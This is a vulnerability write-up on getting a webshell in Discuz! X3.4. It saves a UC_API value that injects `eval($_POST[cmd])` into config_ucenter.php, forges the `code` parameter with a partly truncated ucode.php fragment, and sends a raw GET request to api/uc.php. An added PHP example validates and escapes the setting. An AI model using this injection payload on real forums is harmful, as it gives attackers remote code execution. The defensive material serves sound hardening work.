# Discuz! X3.4: getshell by modifying the UCenter configuration in the admin backend

## Vulnerability reproduction

The exploitation flow is as follows:

1. In the admin backend, go to `Site Admin` (站长) - `UCenter Settings` and change the UCenter communication key to `123456`.
2. Change UC_API to `http://your-ip/discuz!x3.4/uc_server');eval($_POST[cmd]);//` and click Save.
3. Use UC_KEY (the Discuz key) to generate the `code` parameter by running the script `php ucode.php`.
4. Send a GET request carrying the `code` parameter with Burp Suite; a response of `1` indicates success.

![img](images/1589986439989.png)

The script that generates the `code` parameter, ucode.php (fragment):

```php
0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
        return substr($result, 26);
    } else {
        return '';
    }
} else {
    return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>
```

Sending the GET request with the `code` parameter:

![img](images/1589987534699.png)

Request packet:

```
GET /discuz!x3.4/api/uc.php?code=ac7091oTLALD6X24gZeiX5YmqDkLnX4ivIqx1jDnA7NhUAcHHOX3fWWOLWpGwSwfQfz4r5Pgf86bRlDTRkQ% HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ar;q=0.8
Connection: close
Content-Length: 133

http://your-ip/discuz!x3.4/uc_server
```

Shell address:

```
http://your-ip/discuz!x3.4/config/config_ucenter.php
```
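The root cause shown above is that whatever is saved as UC_API is written verbatim into `config/config_ucenter.php`, so a value that closes the string literal becomes PHP code. The following is an added example, not the page's own code or the Discuz! project's fix, of how such a setting can be validated and emitted as a correctly escaped `define()` line; the function names and the `forum.example` host are assumptions.

```php
<?php
// Added example (not Discuz! code): validate UC_API before it is persisted,
// and never build PHP source by concatenating the raw value.

function validate_uc_api(string $value): string
{
    // Defence in depth: quotes, backslashes, control characters and PHP tag
    // characters have no business in a UCenter API base URL.
    if (preg_match('/[\'"\\\\\x00-\x1f<>]/', $value)) {
        throw new InvalidArgumentException('UC_API contains forbidden characters');
    }
    // Only accept a syntactically valid absolute URL.
    if (filter_var($value, FILTER_VALIDATE_URL) === false) {
        throw new InvalidArgumentException('UC_API must be a valid URL');
    }
    // Restrict the scheme to http/https.
    $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('UC_API must use http or https');
    }
    return $value;
}

// Render one define() line for the config file. var_export() produces a
// properly escaped single-quoted PHP literal, so even a value containing
// a quote cannot terminate the string and turn into code.
function render_define(string $name, string $value): string
{
    return sprintf("define('%s', %s);\n", $name, var_export($value, true));
}

// Constructed sample values (placeholder host).
$good = 'http://forum.example/uc_server';
echo render_define('UC_API', validate_uc_api($good));

// The injection-style value from the write-up is rejected by validation.
$bad = "http://forum.example/uc_server');eval(\$_POST[cmd]);//";
try {
    validate_uc_api($bad);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// Even without validation, the escaped literal stays a plain string.
echo render_define('UC_API', $bad);
```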